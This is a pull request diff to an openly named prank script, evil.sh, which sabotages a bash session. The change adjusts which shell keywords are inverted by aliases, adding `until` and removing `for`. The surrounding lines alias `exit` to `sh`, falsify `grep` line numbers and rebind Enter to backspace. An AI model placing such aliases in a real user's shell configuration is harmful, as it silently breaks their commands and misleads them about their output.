### PR TITLE
Invert `until` and don't invert `for`

### DIFF
--- a/evil.sh
+++ b/evil.sh
@@ -43,8 +43,8 @@ alias exit='sh'
 # Add a random number to line numbers when using `grep -n`
 function grep { command grep "$@" | awk -F: '{ r = int(rand() * 10); n = $1; $1 = ""; command if (n ~ /^[0-9]+$/) { o = n+r } else { o = n }; print o ":" substr($0, 2)}'; }
 
-# Invert `if`, `for`, and `while`.
-alias if='if !' for='for !' while='while !'
+# Invert `if`, `while` and `until`
+alias if='if !' while='while !' until='until !'
 
 # Map Enter, Ctrl+J, and Ctrl+M to backspace.
 bind '"\C-J":"\C-?"'


### PR DESCRIPTION
In `bash`, `until` is just the same as `while !`. User may sometimes use this too, so we should invert it too.

I can't figure out when `for !` gives something that's not a syntax error, hence I removed it.